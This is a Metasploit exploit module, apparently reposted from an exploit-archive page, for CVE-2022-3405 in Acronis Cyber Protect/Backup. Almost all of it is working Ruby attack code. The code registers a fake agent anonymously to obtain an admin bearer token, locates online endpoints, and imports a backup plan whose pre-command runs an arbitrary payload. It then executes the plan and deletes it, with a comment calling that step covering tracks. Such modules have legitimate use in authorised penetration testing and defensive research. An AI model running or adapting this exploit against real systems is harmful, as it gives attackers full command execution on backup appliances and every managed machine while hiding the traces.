Share
## https://sploitus.com/exploit?id=PACKETSTORM:182937
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Exploit::Remote::HTTP::AcronisCyber  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Acronis Cyber Protect/Backup remote code execution',  
'Description' => %q{  
Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all,  
compute, storage and application resources. Businesses and Service Providers are using it  
to protect and backup all IT assets in their IT environment.  
The Acronis Cyber Protect appliance, in its default configuration, allows the anonymous  
registration of new protect/backup agents on new endpoints. This API endpoint also  
generates bearer tokens which the agent then uses to authenticate to the appliance.  
As the management web console is running on the same port as the API for the agents, this  
bearer token is also valid for any actions on the web console. This allows an attacker  
with network access to the appliance to start the registration of a new agent, retrieve a  
bearer token that provides admin access to the available functions in the web console.  
  
The web console contains multiple possibilities to execute arbitrary commands on both the  
agents (e.g., via PreCommands for a backup) and also the appliance (e.g., via a Validation  
job on the agent of the appliance). These options can easily be set with the provided bearer  
token, which leads to a complete compromise of all agents and the appliance itself.  
  
You can either use the module `auxiliary/gather/acronis_cyber_protect_machine_info_disclosure`  
to collect target info for exploitation in this module. Or just run this module standalone and  
it will try to exploit the first online endpoint matching your target and payload settings  
configured at the module.  
  
Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and  
Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.  
},  
'Author' => [  
'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module  
'Sandro Tolksdorf of usd AG.' # discovery  
],  
'References' => [  
['CVE', '2022-3405'],  
['URL', 'https://herolab.usd.de/security-advisories/usd-2022-0008/'],  
['URL', 'https://attackerkb.com/topics/WVI3r5eNIc/cve-2022-3405']  
],  
'License' => MSF_LICENSE,  
'Platform' => ['unix', 'linux', 'windows'],  
'Privileged' => true,  
'Arch' => [ARCH_CMD],  
'Targets' => [  
[  
'Unix/Linux Command',  
{  
'Platform' => ['unix', 'linux'],  
'Arch' => ARCH_CMD,  
'Type' => :unix_cmd  
}  
],  
[  
'Windows Command',  
{  
'Platform' => ['windows'],  
'Arch' => ARCH_CMD,  
'Type' => :win_cmd  
}  
]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => '2022-11-08',  
'DefaultOptions' => {  
'SSL' => true,  
'RPORT' => 9877  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],  
'Reliability' => [REPEATABLE_SESSION]  
}  
)  
)  
register_options([  
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Acronis Cyber Protect/Backup instance', '/']),  
OptString.new('HOSTID', [false, 'hostId value collected from recon module "auxiliary/gather/acronis_cyber_protect_machine_info_disclosure"', '']),  
OptString.new('PARENTID', [false, 'parentId value collected from recon module "auxiliary/gather/acronis_cyber_protect_machine_info_disclosure"', '']),  
OptString.new('KEY', [false, 'key value collected from recon module "auxiliary/gather/acronis_cyber_protect_machine_info_disclosure"', '']),  
OptEnum.new('OUTPUT', [true, 'Output format to use', 'none', ['none', 'json']])  
])  
end  
  
# create and import backup plan data with payload  
# returns nil if not successful  
def create_and_import_backup_plan(hostid, parentid, key, payload, access_token2)  
id = Faker::Internet.uuid  
name = Rex::Text.rand_text_alphanumeric(5..8).downcase  
  
# we need to split the payload in the command and the arguments  
# otherwise command execution does not work for windows targets  
cmd_line = payload.split(' ', 2)  
  
case target['Type']  
when :unix_cmd  
source_dir = '/home'  
target_dir = '/tmp'  
when :win_cmd  
source_dir = 'c:/users/public'  
target_dir = 'c:/windows/temp'  
else  
# probably macOS or other unix version  
source_dir = '/home'  
target_dir = '/tmp'  
end  
  
plan_data = {  
allowedActions: ['rename', 'revoke', 'runNow'],  
allowedBackupTypes: ['full', 'incremental'],  
backupType: 'files',  
bootableMediaPlan: false,  
editable: true,  
enabled: true,  
id: id.to_s,  
locations: { data: [{ displayName: target_dir.to_s, id: "[[\"ItemType\",\"local_folder\"],[\"LocalID\",\"#{target_dir}\"]]", type: 'local_folder' }] },  
name: name.to_s,  
options: {  
backupOptions: {  
prePostCommands: {  
postCommands: { command: '', commandArguments: '', continueOnCommandError: false, waitCommandComplete: true, workingDirectory: '' },  
preCommands: {  
command: cmd_line[0].to_s,  
commandArguments: cmd_line[1].to_s,  
continueOnCommandError: true,  
waitCommandComplete: false,  
workingDirectory: ''  
},  
useDefaultCommands: false,  
usePostCommands: false,  
usePreCommands: true  
},  
prePostDataCommands: {  
postCommands: { command: '', commandArguments: '', continueOnCommandError: false, waitCommandComplete: true, workingDirectory: '' },  
preCommands: { command: '', commandArguments: '', continueOnCommandError: false, waitCommandComplete: true, workingDirectory: '' },  
useDefaultCommands: true,  
usePostCommands: false,  
usePreCommands: false  
},  
scheduling: { interval: { type: 'minutes', value: 30 }, type: 'distributeBackupTimeOptions' },  
simultaneousBackups: { simultaneousBackupsNumber: nil },  
snapshot: {  
quiesce: true,  
retryConfiguration: {  
reattemptOnError: true,  
reattemptTimeFrame: { type: 'minutes', value: 5 },  
reattemptsCount: 3,  
silentMode: false  
}  
},  
tapes: { devices: [], overwriteDataOnTape: false, preserveTapesPosition: true, tapeSet: '' },  
taskExecutionWindow: {},  
taskFailureHandling: { periodBetweenRetryAttempts: { type: 'hours', value: 1 }, retryAttempts: 1, retryFailedTask: false },  
taskStartConditions: { runAnyway: false, runAnywayAfterPeriod: { type: 'hours', value: 1 }, waitUntilMet: true },  
validateBackup: false,  
volumes: {  
forceVssFullBackup: false,  
useMultiVolumeSnapshot: true,  
useNativeVssProvider: false,  
useVolumeShadowService: true,  
useVssFlags: ['definedRule']  
},  
vssFlags: { availableVssModes: ['auto', 'system'], enabled: true, value: 'auto', vssFullBackup: false },  
windowsEventLog: { isGlobalConfigurationUsed: true, traceLevel: 'warning', traceState: false },  
withHWSnapshot: false  
},  
specificParameters: { inclusionRules: { rules: [ source_dir.to_s ], rulesType: 'centralizedFiles' }, type: '' }  
},  
origin: 'centralized',  
route: {  
archiveSlicing: nil,  
stages: [  
{  
archiveName: '[Machine Name]-[Plan ID]-[Unique ID]A',  
cleanUpIfNoSpace: false,  
cleanup: {  
time: [  
{ backupSet: 'daily', period: { type: 'days', value: 7 } },  
{ backupSet: 'weekly', period: { type: 'weeks', value: 4 } }  
],  
type: 'cleanupByTime'  
},  
destinationKind: 'local_folder',  
locationScript: nil,  
locationUri: target_dir.to_s,  
locationUriType: 'local',  
maintenanceWindow: nil,  
postAction: {  
convertToVMParameters: {  
agentIds: [],  
cpuCount: nil,  
diskAllocationType: 'thick',  
displayedName: nil,  
enabled: false,  
exactMemorySize: false,  
infrastructureType: '',  
memorySize: nil,  
networkAdapters: [],  
virtualMachineName: '',  
virtualServerHost: nil,  
virtualServerHostKey: '[["ItemType",""],["LocalID",""]]',  
virtualServerStorage: ''  
}  
},  
rules: [  
{  
afterBackup: true,  
backupCountUpperLimit: 0,  
backupSetIndex: 'daily',  
backupUpperLimitSize: 0,  
beforeBackup: false,  
consolidateBackup: false,  
deleteOlderThan: { type: 'days', value: 7 },  
deleteYongerThan: { type: 'days', value: 0 },  
onSchedule: false,  
retentionSchedule: {  
alarms: [],  
conditions: [],  
maxDelayPeriod: -1,  
maxRetries: 0,  
preventFromSleeping: true,  
retryPeriod: 0,  
type: 'none',  
unique: false,  
waitActionType: 'run'  
},  
stagingOperationType: 'justCleanup'  
},  
{  
afterBackup: true,  
backupCountUpperLimit: 0,  
backupSetIndex: 'weekly',  
backupUpperLimitSize: 0,  
beforeBackup: false,  
consolidateBackup: false,  
deleteOlderThan: { type: 'weeks', value: 4 },  
deleteYongerThan: { type: 'days', value: 0 },  
onSchedule: false,  
retentionSchedule: {  
alarms: [],  
conditions: [],  
maxDelayPeriod: -1,  
maxRetries: 0,  
preventFromSleeping: true,  
retryPeriod: 0,  
type: 'none',  
unique: false,  
waitActionType: 'run'  
},  
stagingOperationType: 'justCleanup'  
}  
],  
useProtectionPlanCredentials: true,  
validationRules: nil  
}  
]  
},  
scheme: {  
parameters: {  
backupSchedule: {  
kind: { dataType: 'binary', type: 'full' },  
schedule: {  
alarms: [  
{  
beginDate: { day: 0, month: 0, year: 0 },  
calendar: { days: 65, type: 'weekly', weekInterval: 0 },  
distribution: { enabled: false, interval: 0, method: 0 },  
endDate: { day: 0, month: 0, year: 0 },  
machineWake: false,  
repeatAtDay: { endTime: { hour: 0, minute: 0, second: 0 }, timeInterval: 0 },  
runLater: false,  
skipOccurrences: 0,  
startTime: { hour: 23, minute: 0, second: 0 },  
startTimeDelay: 0,  
type: 'time',  
utcBasedSettings: false  
}  
],  
conditions: [],  
maxDelayPeriod: -1,  
maxRetries: 0,  
preventFromSleeping: true,  
retryPeriod: 0,  
type: 'daily',  
unique: false,  
waitActionType: 'run'  
}  
},  
backupTypeRule: 'byScheme'  
},  
schedule: {  
daysOfWeek: ['monday', 'tuesday', 'wednesday', 'thursday', 'friday'],  
effectiveDates: { from: { day: 0, month: 0, year: 0 }, to: { day: 0, month: 0, year: 0 } },  
machineWake: false,  
preventFromSleeping: true,  
runLater: false,  
startAt: { hour: 23, minute: 0, second: 0 },  
type: 'daily'  
},  
type: 'weekly_full_daily_inc'  
},  
sources: { data: [{ displayName: name.to_s, hostID: hostid.to_s, id: key.to_s }] },  
target: { inclusions: [{ key: key.to_s, resource_key: key.to_s }] },  
tenant: { id: parentid.to_s, locator: "/#{parentid}/", name: parentid.to_s, parentID: '' }  
}.to_json  
  
form_data = Rex::MIME::Message.new  
form_data.add_part(plan_data, 'application/json', nil, "form-data; name=\"planfile\"; filename=\"#{Rex::Text.rand_text_alpha(4..8)}.json\"")  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'api', 'ams', 'backup', 'plan_operations', 'import'),  
'ctype' => "multipart/form-data; boundary=#{form_data.bound}",  
'headers' => {  
'X-Requested-With' => 'XMLHttpRequest',  
'Authorization' => "bearer #{access_token2}"  
},  
'data' => form_data.to_s,  
'vars_get' => {  
'CreateDraftOnError' => true  
}  
})  
return unless res&.code == 200 && res.body.include?('planId') && res.body.include?('importedPlans')  
  
# parse json response and return planId  
res_json = res.get_json_document  
return if res_json.blank?  
  
res_json.dig('data', 'importedPlans', 0, 'planId')  
end  
  
# remove the backup plan on the target including the payload  
# returns true if successful  
def remove_backup_plan(access_token2)  
post_data = {  
planIds: [@planid.to_s]  
}.to_json  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'api', 'ams', 'backup', 'plans_operations', 'remove_plans'),  
'ctype' => 'application/json',  
'headers' => {  
'X-Requested-With' => 'XMLHttpRequest',  
'Authorization' => "bearer #{access_token2}"  
},  
'data' => post_data.to_s  
})  
return false unless res&.code == 200  
  
true  
end  
  
# execute the backup plan on the target including the payload  
# returns true if successful  
def execute_command(access_token2, _opts = {})  
post_data = {  
planId: @planid.to_s  
}.to_json  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'api', 'ams', 'backup', 'plan_operations', 'run'),  
'ctype' => 'application/json',  
'headers' => {  
'X-Requested-With' => 'XMLHttpRequest',  
'Authorization' => "bearer #{access_token2}"  
},  
'data' => post_data.to_s  
})  
return false unless res&.code == 200  
  
true  
end  
  
def cleanup  
# try to remove imported backup plan with payload to cover our tracks  
# but do not run during the check phase  
super  
unless @check_running  
if remove_backup_plan(@access_token2)  
print_good('Backup plan is successful removed.')  
else  
print_warning('Backup plan could not be removed. Try to clean it manually.')  
end  
end  
end  
  
def check  
@check_running = true  
# initial check on api access  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'api', 'meta'),  
'ctype' => 'application/json'  
})  
return Exploit::CheckCode::Unknown('No Acronis API access found!') unless res&.code == 200 && res.body.include?('uri') && res.body.include?('method')  
  
# get first access token  
print_status('Retrieve the first access token.')  
@access_token1 = get_access_token1  
vprint_status("Extracted first access token: #{@access_token1}")  
return Exploit::CheckCode::Unknown('Retrieval of the first access token failed.') if @access_token1.nil?  
  
# register a dummy agent  
client_id = Faker::Internet.uuid  
print_status('Register a dummy backup agent.')  
client_secret = dummy_agent_registration(client_id, @access_token1)  
return Exploit::CheckCode::Unknown('Registering a dummy agent failed.') if client_secret.nil?  
  
print_status('Dummy backup agent registration is successful.')  
  
# get second access_token  
print_status('Retrieve the second access token.')  
@access_token2 = get_access_token2(client_id, client_secret)  
vprint_status("Extracted second access token: #{@access_token2}")  
return Exploit::CheckCode::Unknown('Retrieval of the second access token failed.') if @access_token2.nil?  
  
# get version info  
version = get_version_info(@access_token2)  
return Exploit::CheckCode::Unknown('Can not find any version information.') if version.nil?  
  
release = version.match(/(.+)\.(\d+)/)  
case release[1]  
when '15.0'  
if Rex::Version.new(version) < Rex::Version.new('15.0.29486')  
return Exploit::CheckCode::Appears("Acronis Cyber Protect/Backup #{version}")  
else  
return Exploit::CheckCode::Safe("Acronis Cyber Protect/Backup #{version}")  
end  
when '12.5'  
if Rex::Version.new(version) < Rex::Version.new('12.5.16545')  
return Exploit::CheckCode::Appears("Acronis Cyber Protect/Backup #{version}")  
else  
return Exploit::CheckCode::Safe("Acronis Cyber Protect/Backup #{version}")  
end  
else  
Exploit::CheckCode::Safe("Acronis Cyber Protect/Backup #{version}")  
end  
end  
  
def exploit  
@check_running = false  
# check if @access_token2 is already set as part of autocheck option  
if @access_token2.nil?  
# get first access token  
print_status('Retrieve the first access token.')  
@access_token1 = get_access_token1  
vprint_status("Extracted first access token: #{@access_token1}")  
fail_with(Failure::NoAccess, 'Retrieval of the first access token failed.') if @access_token1.nil?  
  
# register a dummy agent  
client_id = Faker::Internet.uuid  
print_status('Register a dummy backup agent.')  
client_secret = dummy_agent_registration(client_id, @access_token1)  
fail_with(Failure::BadConfig, 'Registering a dummy agent failed.') if client_secret.nil?  
print_status('Dummy backup agent registration is successful.')  
  
# get second access_token  
print_status('Retrieve the second access token.')  
@access_token2 = get_access_token2(client_id, client_secret)  
vprint_status("Extracted second access token: #{@access_token2}")  
fail_with(Failure::NoAccess, 'Retrieval of the second access token failed.') if @access_token2.nil?  
end  
  
# if hostid, parentid and key are blank, fetch the first managed online endpoint defined at the appliance matching the module target setting  
hostid = datastore['HOSTID']  
parentid = datastore['PARENTID']  
key = datastore['KEY']  
if hostid.blank? || parentid.blank? || key.blank?  
print_status('Retrieve first online target registered at the Acronis Cyber Protect/Backup appliance.')  
res_json = get_machine_info(@access_token2)  
fail_with(Failure::NotFound, 'Can not find any configuration information.') if res_json.nil?  
  
# find first online target matching the module target settings  
res_json['data'].each do |item|  
next unless item['type'] == 'machine' && (item['osType'] == 'linux' && target['Type'] == :unix_cmd) || (item['osType'] == 'windows' && target['Type'] == :win_cmd) && item['online']  
  
print_status("Found online target matching your target setting #{target.name}.")  
print_good("hostId: #{item['hostId']}") unless item['hostId'].nil?  
print_good("parentId: #{item['parentId']}") unless item['parentId'].nil?  
print_good("key: #{item['id']}") unless item['id'].nil?  
print_status("type: #{item['type']}") unless item['type'].nil?  
print_status("hostname: #{item['title']}") unless item['title'].nil?  
print_status("IP: #{item.dig('ip', 0)}") unless item.dig('ip', 0).nil?  
print_status("OS: #{item['os']}") unless item['os'].nil?  
print_status("ARCH: #{item['osType']}") unless item['osType'].nil?  
print_status("ONLINE: #{item['online']}") unless item['online'].nil?  
hostid = item['hostId']  
parentid = item['parentId']  
key = item['id']  
break  
end  
end  
fail_with(Failure::NotFound, "No target available matching your target setting #{target.name}.") if hostid.blank? || parentid.blank? || key.blank?  
  
# create and import backup plan with payload  
print_status("Import backup plan with payload for target with hostId: #{hostid}.")  
@planid = create_and_import_backup_plan(hostid, parentid, key, payload.encoded, @access_token2)  
fail_with(Failure::BadConfig, 'Importing backup plan with payload failed.') if @planid.nil?  
  
print_status("Executing #{target.name} with payload #{datastore['PAYLOAD']}")  
case target['Type']  
when :unix_cmd, :win_cmd  
execute_command(@access_token2)  
end  
end  
end